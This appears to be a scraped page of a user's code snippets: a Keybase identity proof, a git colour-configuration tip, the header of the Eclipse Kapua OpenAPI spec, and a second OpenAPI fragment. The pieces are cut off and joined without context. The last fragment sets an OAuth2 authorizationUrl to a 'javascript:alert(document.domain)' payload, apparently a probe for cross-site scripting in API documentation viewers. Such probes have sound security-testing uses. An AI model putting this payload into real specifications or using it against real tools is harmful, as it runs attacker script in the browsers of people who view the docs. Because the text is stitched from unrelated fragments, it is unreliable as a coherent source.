I hereby claim:
- I am lorthirk on github.
- I am lorthirk (https://keybase.io/lorthirk) on keybase.
- I have a public key whose fingerprint is 24AA A359 ABFE E329 D736 2389 FD65 651D D544 2AD6
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
Bored with just black and white in your git status? Add some colour!
Open up your global Git configuration file (it should be found in ~/.gitconfig
) and enter this into it:
[color]
ui = auto
[color "branch"]
current = yellow reverse
local = yellow
remote = green
openapi: 3.0.2 | |
info: | |
title: Eclipse Kapua REST API | |
version: '1.0' | |
contact: | |
name: Eclipse Kapua Dev Team | |
url: 'https://eclipse.org/kapua' | |
email: [email protected] | |
license: | |
name: Eclipse Public License 2.0 |
openapi: 3.0.0 | |
components: | |
securitySchemes: | |
OAuth2: | |
type: oauth2 | |
flows: | |
authorizationCode: | |
authorizationUrl: javascript:alert(document.domain)// | |
tokenUrl: https://example.com/oauth/token | |
scopes: |